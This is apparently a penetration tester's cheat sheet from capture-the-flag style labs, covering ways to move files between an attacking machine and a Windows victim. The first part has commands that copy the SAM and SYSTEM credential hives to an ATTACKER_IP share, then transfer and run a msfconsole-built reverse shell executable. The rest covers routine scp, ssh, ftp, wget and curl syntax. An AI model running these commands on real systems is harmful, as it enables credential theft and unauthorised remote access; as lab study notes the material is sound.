SMBSERVER - victim to attacker
on attacking create a share directory: mkdir share
Launch on attacking machine - transfers from Windows victim to Attacker
python3.9 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
- This will create a share named public pointing to the share directory
- then copy over the files
C:\> copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public\
C:\> copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public\
Another way: SMBServer - copy from attacking to victim
- Create the reverse shell exe using msfconsole
- in same directory, start up the smb server
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
- run on windows: copy the exe (transfer over)
copy \\10.10.10.10\kali\reverse.exe C:\PrivEsc\reverse.exe
- start the exe
C:\PrivEsc\reverse.exe
Python Server and SCP
How to start a python server
python3 -m http.server
(always start in the directory you wish to transfer files from)
Using SCP to tranfer files
-r
local to remote
scp -r /local/directory/123.txt remote_username@<ip>:/remote/directory
remote to local
scp user@host:/path on remote /path on local
(can use . (period) to download to the current working directory)
-P
if not on default port
-C
Copy files with compression
-v
Verbose mode
FTP
get - downloads
put - uploads
Syntax: ftp <ip address>
SSH
-p -to set port unless default
syntax: ssh <username>@<ip address> -p <optional>
syntax: ssh -i <private key> <username>@<ip address> -p <optional>
WGET
syntax: wget <site address>
CURL
curl <website> --output <filename>
curl -k <website> = skips ssl checks